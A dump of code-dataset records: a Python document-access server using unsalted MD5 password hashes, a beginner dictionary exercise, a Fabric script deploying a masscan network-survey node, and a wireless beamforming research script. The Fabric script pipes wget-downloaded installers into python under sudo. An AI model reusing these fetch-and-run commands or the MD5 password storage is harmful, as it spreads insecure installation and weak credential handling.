def isDocumentAvailable(self, currentUser, filename):\n        availableDocs = self.availableDocumentsList(currentUser)\n        if filename in availableDocs:\n            return 0\n        else:\n            return 1\n\n    def availableDocumentsList(self,currentUser):\n        self.cur.execute(\"SELECT filename FROM hru \"\n                         \"WHERE user = ? AND\"\n                         \"(right = ? OR right = ?);\",\n                         [currentUser, \"s\", \"o\"])\n        availableDocs= []\n        for row in self.cur:\n            availableDocs.append(row[0])\n        return availableDocs\n\n    def addUser(self, user, password):\n        self.users.append(user)\n        hash = MD5.new()\n        hash.update(password.encode())\n        # store the issued login/password pair in the users table\n        self.cur.execute(\"INSERT INTO users (login, md5pass) \"\n                         \"VALUES (?, ?);\",\n                         [user, sqlite3.Binary(hash.digest())])\n        self.con.commit()\n        # generate the public and private keys\n        key = RSA.generate(2048)\n        f = open('storage/private/' + user + '.pem', 'wb')\n        f.write(key.exportKey(\"PEM\"))\n        f.close()\n        f = open('storage/public/' + user + '.pem', 'wb')\n        f.write(key.publickey().exportKey(\"PEM\"))\n        f.close()\n        # record right \"n\" for every file in the HRU matrix\n        for doc in self.documents:\n            self.cur.execute(\"INSERT INTO hru \"\n                             \"(filename, user, right)\"\n                             \"VALUES (?,?,?);\",\n                             [doc, user, \"n\"])\n            self.con.commit()\n\n    def deleteUser(self, user, deleteFiles=False):\n        if user not in self.users:\n            print(\"not existing user\")\n            return\n        self.cur.execute(\"DELETE FROM hru WHERE user = ?\",\n                         [user])\n        self.con.commit()\n        self.cur.execute(\"DELETE FROM users WHERE login = ?\",\n                         [user])\n        self.con.commit()\n        if deleteFiles:\n            self.cur.execute(\"SELECT filename FROM files \"\n                             \"WHERE OWNER = ?\",\n                             [user])\n            rows = self.cur.fetchall()  # fetch first: the same cursor is reused for the deletes below\n            for row in rows:\n                self.cur.execute(\"DELETE FROM files WHERE filename = ?\",\n                                 [row[0]])\n                self.con.commit()\n                # TODO: add a step that physically deletes the files\n\n    # while logged in as currentUser, set user's right on file filename to right\n    def changeRight(self, currentUser, filename, right, user):\n        if (user not in self.users) or (filename not in self.documents) or \\\n                (currentUser not in self.users) or (right not in [\"s\", \"n\"]):\n            return 1, \"Not existing user or document or right\"\n        self.cur.execute(\"SELECT owner FROM files \"\n                         \"WHERE filename = ?;\",\n                         [filename])\n        owner = \"\"\n        for row in self.cur:\n            owner = row[0]\n        if owner == currentUser:\n            self.cur.execute(\"UPDATE hru SET \"\n                             \"right = ? \"\n                             \"WHERE user = ? AND filename = ?;\",\n                             [right, user, filename])\n            self.con.commit()\n            return 0, \"You've changed right of \" + filename + \" for \" + user\n        else:\n            return 1, \"You're not the owner of this file\"\n\n\n    def isUserOrFileExist(self,user,filename):\n        if (user in self.users) and (filename in self.documents):\n            return 0, \"user or document exist\"\n        else:\n            return 1, \"not existing user or document\"\n\n    def isUserOwnerOfDocument(self,user, filename):\n        owner = self.getOwner(filename)\n        if owner == user:\n            return 0, \"You're owner of this document\"\n        else:\n            return 1, \"You're not owner of this document\"\n\n\n    def isDocumentSigned(self,user,filename):\n        currentSign = self.getSign(filename)\n        if currentSign == \"-\":\n            return 0, \"Document is not signed\"\n        else:\n            return 1, \"Document signed\"\n\n    def getSign(self,filename):\n        self.cur.execute(\"SELECT sign FROM files \"\n                         \"WHERE filename = ?;\",\n                         [filename])\n        currentSign = \"\"\n        for row in self.cur:\n            currentSign = row[0]\n        return currentSign\n\n    def getOwner(self,filename):\n        self.cur.execute(\"SELECT owner FROM files \"\n                         \"WHERE filename = ?;\",\n                         [filename])\n        owner = \"\"\n        for row in self.cur:\n            owner = row[0]\n        return owner\n\n    def signDocument(self, user, filename, sign):\n        self.cur.execute(\"UPDATE files SET \"\n                         \"sign = ? \"\n                         \"WHERE owner = ? AND filename = ?;\",\n                         [sign, user, filename])\n        self.con.commit()\n        return 0, \"You signed this document\"\n","sub_path":"Server/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
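# Added usage sketch (illustration only, not one of the dataset records):
# driving the Database class from the record above; the user and file names
# are invented examples, and Petrel.db plus the storage/ folders must exist.
db = Database()
db.addUser('alice', 's3cret')                  # issues RSA keys; right "n" on all files
db.addUser('bob', 'hunter2')
db.addDocument('report.txt', 'alice')          # alice becomes the owner (right "o")
db.changeRight('alice', 'report.txt', 's', 'bob')  # alice grants access right "s" to bob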
+{"seq_id":"73655873","text":"# Exercise 1: merge two lists into one dictionary\n# \t\tname list [\"张无忌\",\"赵敏\",\"周芷若\"]\n# \t\troom list [101,102,103]\n\n# Exercise 2: swap the keys and values of the Exercise 1 dictionary\nlist_names = [\"张无忌\", \"赵敏\", \"周芷若\"]\nlist_rooms = [101, 102, 103]\n\n# dict_infos = {}\n# for i in range(len(list_names)):\n#     # list_rooms[i] as the key\n#     # list_names[i] as the value\n#     dict_infos[list_rooms[i]] = list_names[i]\n# print(dict_infos)\n\ndict_infos = {list_rooms[i]: list_names[i]\n              for i in range(len(list_names))\n              }\n\nresult = {v: k for k, v in dict_infos.items()}\n\nprint(dict_infos)\nprint(result)\n","sub_path":"month_01/teacher/day06/exercise07.py","file_name":"exercise07.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"590163471","text":"import tempfile\nimport shutil\nimport os\n\nfrom fabric.api import *\n\nenv.use_ssh_config = True\n\nDEBS = ['emacs23-nox',\n        'unattended-upgrades',\n        'ntp', # turns out to be more important than you'd think\n        'collectd',\n        'nginx',\n        'libhiredis*',\n        'ethtool',\n        ]\n\n@task\ndef install_debs():\n    \"Install and upgrade debian dependencies.\"\n    sudo('apt-get update')\n    sudo('apt-get dist-upgrade -y')\n    sudo('apt-get install -y ' + ' '.join(DEBS))\n    sudo('apt-get autoremove -y')\n\n@task\ndef configure_upgrades():\n    \"Configure unattended upgrades\"\n    put('configs/50unattended-upgrades',\n        '/etc/apt/apt.conf.d/50unattended-upgrades',\n        use_sudo=True)\n    put('configs/unattended-upgrades-10periodic',\n        '/etc/apt/apt.conf.d/10periodic',\n        use_sudo=True)\n\n@task\ndef set_timezone():\n    \"Set timezone to Etc/UTC.\"\n    sudo('echo \"Etc/UTC\" > /etc/timezone')\n    sudo('dpkg-reconfigure -f noninteractive tzdata')\n\n@task\ndef install_pip():\n    \"Install latest setuptools and pip.\"\n    sudo('wget https://bitbucket.org/pypa/setuptools/raw/bootstrap/'\n         'ez_setup.py -O - | python')\n    run('rm setuptools-*.tar.gz')\n    sudo('wget 
https://raw.github.com/pypa/pip/master/contrib/'\n 'get-pip.py -O - | python')\n\n@task\ndef install_tasa():\n \"Install tasa.\"\n sudo('pip install -U tasa')\n\n@task\ndef configure_tasa():\n \"Configure tasa.\"\n sudo('mkdir -p /etc/tasa')\n put('configs/tasa.conf', '/etc/tasa/tasa.conf')\n\n@task\ndef configure_collectd():\n \"Configure collectd\"\n put('configs/collectd.conf', '/etc/collectd/collectd.conf', use_sudo=True)\n sudo('service collectd restart')\n\n@task\ndef configure_nginx():\n \"Configure nginx\"\n sudo('rm /etc/nginx/sites-enabled/*')\n put('configs/optout.nginx',\n '/etc/nginx/sites-enabled/optout',\n use_sudo=True)\n sudo('mkdir -p /usr/share/nginx/www')\n put('configs/optout.html',\n '/usr/share/nginx/www/index.html')\n sudo('service nginx restart')\n\n@task\n@runs_once # do this once, locally\ndef compile_masscan():\n \"Download and compile latest masscan\"\n try:\n os.remove('masscan')\n except OSError:\n pass\n local('sudo apt-get install -y build-essential libpcap-dev')\n tempdir = tempfile.mkdtemp()\n with lcd(tempdir):\n local('git clone https://github.com/robertdavidgraham/masscan')\n with lcd('masscan'):\n local('make')\n local('make regress')\n shutil.move(os.path.join(tempdir, 'masscan/bin/masscan'),\n '.')\n shutil.rmtree(tempdir)\n\n@task\ndef configure_masscan():\n \"Copy masscan configuration\"\n sudo('mkdir -p /etc/masscan')\n put('configs/masscan.conf', '/etc/masscan/masscan.conf',\n use_sudo=True)\n put('configs/excludes.txt', '/etc/masscan/excludes.txt',\n use_sudo=True)\n put('configs/masscan.upstart', '/etc/init/masscan.conf',\n use_sudo=True)\n sudo('service masscan restart', warn_only=True)\n\n@task\ndef copy_masscan():\n \"Copy the masscan binary to remote\"\n put('masscan', '/usr/local/bin/masscan',\n use_sudo=True, mirror_local_mode=True)\n\n@task\ndef install_masscan():\n \"Compile masscan locally and install remotely\"\n compile_masscan()\n copy_masscan()\n configure_masscan()\n # don't worry about cleaning up the local masscan binary\n\n@task\ndef reboot():\n \"Reboot. 
Doesn't wait.\"\n sudo('shutdown -r 0')\n\n@task(default=True)\ndef configure_survey():\n \"Run all configuration to set up survey slave\"\n install_masscan() # do this first because it uses local sudo\n\n install_debs()\n configure_upgrades()\n set_timezone()\n install_pip()\n install_tasa()\n configure_collectd()\n configure_nginx()\n\n reboot()\n\n\n@task\ndef check_networking():\n sudo('ethtool -k eth0')\n sudo('ethtook -k eth1')\n","sub_path":"configurator/fabfile/survey.py","file_name":"survey.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"449129519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 16:08:03 2019\n@author: farismismar\n\"\"\"\n\nimport random\nimport os\nimport numpy as np\nimport pandas as pd\nimport math\n\nimport itertools\nimport xgboost as xgb\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import confusion_matrix\n\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.metrics import confusion_matrix\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tick\nfrom matplotlib.ticker import MultipleLocator, FuncFormatter\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport matplotlib2tikz\n\nos.chdir('/Users/farismismar/Desktop/DeepMIMO')\n# 0) Some parameters\nseed = 0\nK_fold = 2\nlearning_rate = 0.05\nmax_users = 54481\nr_exploitation = 0.8\np_blockage = 0.4\n\np_randomness = 0.3 # 0 = all users start in 3.5\n\n# in Mbps\nrate_threshold_sub6 = 1.72 # median\nrate_threshold_mmWave = 7.00\n\ntraining_request_handover_threshold = np.inf #(1 - p_randomness) * rate_threshold_sub6 + p_randomness * rate_threshold_mmWave # this is x_hr, but only for the training data.\nrequest_handover_threshold = (1 - p_randomness) * rate_threshold_sub6 + p_randomness * rate_threshold_mmWave # this is x_hr\n\n# in ms\ngap_fraction = 0.6 # rho\n\n# in Watts\nPTX_35 = 1 # in Watts for 3.5 GHz\nPTX_28 = 1 # in Watts for 28 GHz\n\n# speed:\nv_s = 50 # km/h not pedestrian, but vehicular speeds.\n\ndelta_f_35 = 180e3 # Hz/PRB\ndelta_f_28 = 180e3 # Hz/PRB\nN_SC_35 = 1\nN_SC_28 = 1\n\nmmWave_BW_multiplier = 10 # x sub-6\nB_35 = N_SC_35 * delta_f_35\nB_28 = N_SC_28 * delta_f_28 * mmWave_BW_multiplier\nNf = 7 # dB noise fig.\n\nk_B = 1.38e-23 # Boltzmann\nT = 290 # Kelvins\n\nN_exploit = int(r_exploitation * max_users)\n\n# 1) Read the data\n# Add a few lines to caputre the seed for reproducibility.\nrandom.seed(seed)\nnp.random.seed(seed)\n\ndef create_dataset():\n # Takes the three.csv files and merges them in a way that is useful for the Deep Learning.\n # regenerate the dataset for 3.5 (y,z = 8x4) and 28 (y, z = 64x4)\n df35 = pd.read_csv('dataset/dataset_3.5_GHz.csv')\n df28_b = pd.read_csv('dataset/dataset_28_GHz_blockage.csv')\n df28_nb = pd.read_csv('dataset/dataset_28_GHz.csv')\n \n # Truncate to the first max_users rows, for efficiency for now\n df35 = df35.iloc[:max_users,:]\n df28_b = df28_b.iloc[:max_users,:]\n df28_nb = df28_nb.iloc[:max_users,:]\n \n sub6_Y, sub6_Z = 8, 4\n mmWave_Y, mmWave_Z = 64, 4\n \n # Check that distances are similar\n assert(np.all(df28_b.iloc[:,-3:] == df28_nb.iloc[:,-3:]))\n \n # Based on blocking probability, create df28.\n p_b = np.random.binomial(1, p=p_blockage, size=max_users)\n df28 = df28_b.copy()\n df28.loc[(p_b==1),:] = 
# Based on blocking probability, create df28.\n p_b = np.random.binomial(1, p=p_blockage, size=max_users)\n df28 = df28_b.copy()\n df28.loc[(p_b==1),:] = df28_b.loc[(p_b == 1),:]\n df28.loc[(p_b==0),:] = df28_nb.loc[(p_b == 0),:]\n \n # Map: 0 is ID; 1-YZ+1 are H real; YZ+1-2YZ+1 are Himag; last three are x,y,z \n # 2) Perform data wrangling and construct the proper channel matrix H\n H35_real = df35.iloc[:,1:(sub6_Y*sub6_Z+1)]\n H35_imag = df35.iloc[:,(sub6_Y*sub6_Z+1):(2*sub6_Y*sub6_Z+1)]\n H35_loc = df35.iloc[:,-3:]\n \n H28_real = df28.iloc[:,1:(mmWave_Y*mmWave_Z+1)]\n H28_imag = df28.iloc[:,(mmWave_Y*mmWave_Z+1):(2*mmWave_Y*mmWave_Z+1)]\n H28_loc = df28.iloc[:,-3:] \n \n # Before moving forward, check if the loc at time t is equal\n df35 = df35.rename(columns={df35.columns[-3]: 'lon', \n df35.columns[-2]: 'lat', \n df35.columns[-1]: 'height'})\n\n df28 = df28.rename(columns={df28.columns[-3]: 'lon', \n df28.columns[-2]: 'lat', \n df28.columns[-1]: 'height'})\n \n assert(np.all(df35.iloc[:,-3:] == df28.iloc[:,-3:]))\n \n # Reset the column names of the imaginary H\n H35_imag.columns = H35_real.columns\n H28_imag.columns = H28_real.columns\n \n H35 = H35_real + 1j * H35_imag\n H28 = H28_real + 1j * H28_imag\n \n del H35_loc, H28_real, H28_imag, H28_loc\n \n F_35 = compute_bf_codebook(My=sub6_Y, Mz=sub6_Z, f_c=3.5e9)\n F_28 = compute_bf_codebook(My=mmWave_Y, Mz=mmWave_Z, f_c=28e9)\n \n channel_gain_35 = []\n channel_gain_28 = []\n \n # Compute the channel gain |h*f|\n # Beamforming is now both vertical and horizontal\n for i in np.arange(max_users):\n h35_i = np.array(H35.iloc[i,:])\n h28_i = np.array(H28.iloc[i,:])\n channel_gain_35.append(compute_optimal_gain_bf_vector(h35_i, F_35))\n channel_gain_28.append(compute_optimal_gain_bf_vector(h28_i, F_28))\n \n # 3) Feature engineering: introduce RSRP mmWave and sub-6 and y\n channel_gain_28 = np.array(channel_gain_28).astype(float)\n channel_gain_35 = np.array(channel_gain_35).astype(float)\n \n # Get rid of unwanted columns in 3.5\n df35 = df35[['0', 'lon', 'lat', 'height']]\n df35.columns = ['user_id', 'lon', 'lat', 'height']\n\n df = df35.copy() \n df.loc[:,'P_RX_35'] = 10*np.log10(PTX_35 * 1e3 * channel_gain_35)\n df.loc[:,'P_RX_28'] = 10*np.log10(PTX_28 * 1e3 * channel_gain_28)\n \n df = df.iloc[:max_users,:]\n df = df[['user_id', 'lon', 'lat', 'height', 'P_RX_35', 'P_RX_28']]\n df.to_csv('dataset.csv', index=False)\n \n return df\n\ndef compute_optimal_gain_bf_vector(h, F):\n M, MK = F.shape\n\n max_gain = 0\n\n for code_index in np.arange(MK):\n f_i = F[:,code_index]\n channel_gain = abs(np.vdot(h, f_i)) ** 2\n if (channel_gain > max_gain):\n max_gain = channel_gain\n \n return max_gain\n \ndef compute_bf_codebook(My, Mz, f_c, k_oversampling=1):\n Fy = np.zeros([My, My*k_oversampling], dtype=complex) # F is M rows by Mk columns, where M corresponds to the antennas in the horizontal direction\n\n theta_y_n = math.pi * np.arange(start=0., stop=1., step=1./(k_oversampling*My))\n\n for n in np.arange(My*k_oversampling):\n f_n = _compute_bf_vector(f_c, theta_y_n[n], My)\n Fy[:,n] = f_n\n \n Fz = np.zeros([Mz, Mz*k_oversampling], dtype=complex) # F is M rows by Mk columns, where M corresponds to the antennas in the vertical direction\n\n theta_z_n = math.pi * np.arange(start=0., stop=1., step=1./(k_oversampling*Mz))\n\n for n in np.arange(Mz*k_oversampling):\n f_n = _compute_bf_vector(f_c, theta_z_n[n], Mz)\n Fz[:,n] = f_n\n\n F = np.kron(Fz, Fy)\n \n return F\n\ndef _compute_bf_vector(f_c, theta, M_ULA):\n # Create DFT beamforming codebook\n c = 299792458 # speed of light\n wavelength = c / f_c\n \n d = wavelength / 2. # antenna spacing \n k = 2. 
* math.pi / wavelength\n\n exponent = 1j * k * d * math.cos(theta) * np.arange(M_ULA)\n \n f = 1. / math.sqrt(M_ULA) * np.exp(exponent)\n \n return f\n\ndef get_misclassification_error(y_test, y_pred, y_score):\n cm = confusion_matrix(y_test, y_pred)\n tn, fp, fn, tp = cm.ravel()\n \n mu = (fp + fn) / (fp + fn + tn + tp)\n \n return cm, mu\n\ndef plot_confusion_matrix(y_test, y_pred, y_score):\n # Compute confusion matrix\n # classes = [0,1]\n class_names = ['Deny','Grant']\n normalize = False\n \n cm, _ = get_misclassification_error(y_test, y_pred, y_score)\n np.set_printoptions(precision=2)\n \n # Plot non-normalized confusion matrix\n fig = plt.figure(figsize=(10,9))\n ax = fig.gca()\n ax.set_xticks([-1,0,1])\n ax.set_yticks([-1,0,1])\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}']\n \n ax.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues, aspect='auto', origin='lower')\n\n # label the ticks with the respective list entries\n ax.set_xticklabels(['']+class_names)\n ax.set_yticklabels(['']+class_names)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2.\n for i, j in itertools.product(np.arange(cm.shape[0]), np.arange(cm.shape[1])):\n ax.text(x=j, y=i, s=format(cm[i, j], fmt),\n horizontalalignment=\"center\", va='center',\n color=\"white\" if cm[i, j] > thresh else \"black\")\n \n plt.xlabel(r'\\textbf{Predicted label}')\n plt.ylabel(r'\\textbf{True label}')\n plt.tight_layout()\n plt.savefig('figures/conf_matrix_{}.pdf'.format(p_randomness), format='pdf')\n\n\ndef _parula_map():\n # https://stackoverflow.com/questions/34859628/has-someone-made-the-parula-colormap-in-matplotlib\n from matplotlib.colors import LinearSegmentedColormap\n \n cm_data = [[0.2081, 0.1663, 0.5292], [0.2116238095, 0.1897809524, 0.5776761905], \n [0.212252381, 0.2137714286, 0.6269714286], [0.2081, 0.2386, 0.6770857143], \n [0.1959047619, 0.2644571429, 0.7279], [0.1707285714, 0.2919380952, \n 0.779247619], [0.1252714286, 0.3242428571, 0.8302714286], \n [0.0591333333, 0.3598333333, 0.8683333333], [0.0116952381, 0.3875095238, \n 0.8819571429], [0.0059571429, 0.4086142857, 0.8828428571], \n [0.0165142857, 0.4266, 0.8786333333], [0.032852381, 0.4430428571, \n 0.8719571429], [0.0498142857, 0.4585714286, 0.8640571429], \n [0.0629333333, 0.4736904762, 0.8554380952], [0.0722666667, 0.4886666667, \n 0.8467], [0.0779428571, 0.5039857143, 0.8383714286], \n [0.079347619, 0.5200238095, 0.8311809524], [0.0749428571, 0.5375428571, \n 0.8262714286], [0.0640571429, 0.5569857143, 0.8239571429], \n [0.0487714286, 0.5772238095, 0.8228285714], [0.0343428571, 0.5965809524, \n 0.819852381], [0.0265, 0.6137, 0.8135], [0.0238904762, 0.6286619048, \n 0.8037619048], [0.0230904762, 0.6417857143, 0.7912666667], \n [0.0227714286, 0.6534857143, 0.7767571429], [0.0266619048, 0.6641952381, \n 0.7607190476], [0.0383714286, 0.6742714286, 0.743552381], \n [0.0589714286, 0.6837571429, 0.7253857143], \n [0.0843, 0.6928333333, 0.7061666667], [0.1132952381, 0.7015, 0.6858571429], \n [0.1452714286, 0.7097571429, 0.6646285714], [0.1801333333, 0.7176571429, \n 0.6424333333], [0.2178285714, 0.7250428571, 0.6192619048], \n [0.2586428571, 0.7317142857, 0.5954285714], [0.3021714286, 0.7376047619, \n 0.5711857143], [0.3481666667, 0.7424333333, 0.5472666667], \n [0.3952571429, 0.7459, 0.5244428571], [0.4420095238, 
0.7480809524, \n 0.5033142857], [0.4871238095, 0.7490619048, 0.4839761905], \n [0.5300285714, 0.7491142857, 0.4661142857], [0.5708571429, 0.7485190476, \n 0.4493904762], [0.609852381, 0.7473142857, 0.4336857143], \n [0.6473, 0.7456, 0.4188], [0.6834190476, 0.7434761905, 0.4044333333], \n [0.7184095238, 0.7411333333, 0.3904761905], \n [0.7524857143, 0.7384, 0.3768142857], [0.7858428571, 0.7355666667, \n 0.3632714286], [0.8185047619, 0.7327333333, 0.3497904762], \n [0.8506571429, 0.7299, 0.3360285714], [0.8824333333, 0.7274333333, 0.3217], \n [0.9139333333, 0.7257857143, 0.3062761905], [0.9449571429, 0.7261142857, \n 0.2886428571], [0.9738952381, 0.7313952381, 0.266647619], \n [0.9937714286, 0.7454571429, 0.240347619], [0.9990428571, 0.7653142857, \n 0.2164142857], [0.9955333333, 0.7860571429, 0.196652381], \n [0.988, 0.8066, 0.1793666667], [0.9788571429, 0.8271428571, 0.1633142857], \n [0.9697, 0.8481380952, 0.147452381], [0.9625857143, 0.8705142857, 0.1309], \n [0.9588714286, 0.8949, 0.1132428571], [0.9598238095, 0.9218333333, \n 0.0948380952], [0.9661, 0.9514428571, 0.0755333333], \n [0.9763, 0.9831, 0.0538]]\n \n parula_map = LinearSegmentedColormap.from_list('parula', cm_data)\n \n return parula_map\n\ndef plot_joint_pdf(X, Y):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 30\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n num_bins = 50\n H, X_bin_edges, Y_bin_edges = np.histogram2d(X, Y, bins=(num_bins, num_bins), normed=True)\n for y in np.arange(num_bins):\n H[y,:] = H[y,:] / sum(H[y,:])\n pdf = H / num_bins \n \n ax = plt.gca(projection=\"3d\")\n \n x, y = np.meshgrid(X_bin_edges, Y_bin_edges)\n\n surf = ax.plot_surface(x[:num_bins, :num_bins], y[:num_bins, :num_bins], pdf[:num_bins, :num_bins], cmap=_parula_map(), antialiased=True)\n #cb = fig.colorbar(surf, shrink=0.5)\n ax.view_init(5, 45) # the first param rotates the z axis inwards or outwards the screen. 
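In Matplotlib terms this is view_init(elev, azim): the 5 is the camera elevation. 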
The second is our guy.\n \n # No background color \n ax.xaxis.pane.fill = False\n ax.yaxis.pane.fill = False\n ax.zaxis.pane.fill = False\n \n # Now set color to white (or whatever is \"invisible\")\n ax.xaxis.pane.set_edgecolor('w')\n ax.yaxis.pane.set_edgecolor('w')\n ax.zaxis.pane.set_edgecolor('w')\n\n ax.set_xlabel('3.5 GHz')\n ax.set_ylabel('28 GHz')\n ax.set_zlabel('Joint Throughput pdf')\n\n ax.invert_xaxis()\n ax.invert_yaxis()\n \n ax.set_xlim(int(np.max(X)), 0)\n ax.set_ylim(int(np.max(Y)), 0)\n ax.set_zlim(np.min(pdf), np.max(pdf))\n \n ax.xaxis.labelpad=20\n ax.yaxis.labelpad=20\n ax.zaxis.labelpad=20\n \n plt.xticks([3,2,1,0])\n plt.yticks([15,10,5,0])\n \n plt.tight_layout()\n \n plt.savefig('figures/joint_throughput_pdf_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/joint_throughput_pdf_{}.tikz'.format(p_randomness))\n\ndef plot_joint_cdf(X, Y):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 30\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n num_bins = 100\n H, X_bin_edges, Y_bin_edges = np.histogram2d(X, Y, bins=(num_bins, num_bins), normed=True)\n for y in np.arange(num_bins):\n H[y,:] = H[y,:] / sum(H[y,:])\n pdf = H / num_bins\n \n cdf = np.zeros((num_bins, num_bins))\n for i in np.arange(num_bins):\n for j in np.arange(num_bins):\n cdf[i,j] = sum(sum(pdf[:(i+1), :(j+1)]))\n\n ax = plt.gca(projection=\"3d\")\n x, y = np.meshgrid(X_bin_edges, Y_bin_edges)\n\n surf = ax.plot_surface(x[:num_bins, :num_bins], y[:num_bins, :num_bins], cdf[:num_bins, :num_bins], cmap=_parula_map(), antialiased=True)\n# cb = fig.colorbar(surf, shrink=0.5)\n ax.view_init(5, 45) # the first param rotates the z axis inwards or outwards the screen. 
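As in the pdf plot above, the arguments are view_init(elev, azim). 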
The second is our guy.\n \n # No background color \n ax.xaxis.pane.fill = False\n ax.yaxis.pane.fill = False\n ax.zaxis.pane.fill = False\n \n # Now set color to white (or whatever is \"invisible\")\n ax.xaxis.pane.set_edgecolor('w')\n ax.yaxis.pane.set_edgecolor('w')\n ax.zaxis.pane.set_edgecolor('w')\n\n ax.set_xlabel('3.5 GHz')\n ax.set_ylabel('28 GHz')\n ax.set_zlabel('Joint Throughput CDF')\n \n ax.invert_xaxis()\n ax.invert_yaxis()\n \n ax.set_xlim(int(np.max(X)), 0)\n ax.set_ylim(int(np.max(Y)), 0)\n ax.set_zlim(0,1)\n\n ax.xaxis.labelpad=20\n ax.yaxis.labelpad=20\n ax.zaxis.labelpad=20\n\n plt.xticks([3,2,1,0])\n plt.yticks([15,10,5,0])\n \n plt.tight_layout()\n \n plt.savefig('figures/joint_throughput_cdf_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/joint_throughput_cdf_{}.tikz'.format(p_randomness))\n\ndef plot_pdf(data1, label1, data2, label2):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n labels = [label1, label2]\n\n num_bins = 50\n counts, bin_edges = np.histogram(data1, bins=num_bins, density=True)\n pdf = counts #np.cumsum(counts) / counts.sum()\n\n lw = 2 \n plt.xlabel('Coherence time (ms)')\n plt.grid(True, axis='both', which='both')\n ax = fig.gca()\n plot1, = ax.plot(bin_edges[1:], pdf, linewidth=lw)\n ax.set_ylabel('sub-6 Coherence time pdf')\n \n counts, bin_edges = np.histogram(data2, bins=num_bins, density=True)\n pdf = counts #np.cumsum(counts) / counts.sum()\n ax_sec = ax.twinx()\n plot2, = ax_sec.plot(bin_edges[1:], pdf, color='red', linewidth=lw)\n \n plt.legend([plot1, plot2], labels, loc=\"best\")\n ax_sec.set_ylabel('mmWave Coherence time pdf')\n plt.tight_layout()\n plt.savefig('figures/coherence_time_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/coherence_time_{}.tikz'.format(p_randomness))\n \ndef plot_throughput_cdf(T, filename, legend=True):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'smaller'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n labels = T.columns\n\n num_bins = 50\n\n for data in T:\n data_ = T[data]\n\n counts, bin_edges = np.histogram(data_, bins=num_bins, density=True)\n cdf = np.cumsum(counts) / counts.sum()\n ax = fig.gca()\n if data == 'mmWave only':\n style = 'r-'\n elif data == 'Sub-6 only':\n style = 'b-'\n elif data == 'Optimal':\n style = '^--'\n elif data == 'Proposed':\n# lw = 3.5\n style = '+-'\n else:\n style = '-'\n ax.plot(bin_edges[1:], cdf, style, linewidth=2, markevery=10)\n\n plt.legend(labels, loc=\"best\")\n \n if not legend:\n ax.get_legend().remove()\n \n plt.grid('both', linestyle='dashed')\n ax.set_ylim(0, 1)\n plt.xlabel('Throughput [Mbps]')\n plt.ylabel('Throughput CDF')\n plt.tight_layout() \n \n plt.savefig('figures/{}.pdf'.format(filename), format='pdf')\n 
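# Also export a TikZ version for LaTeX; matplotlib2tikz serializes the\n # currently open figure, so this must run before the figure is closed.\n 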
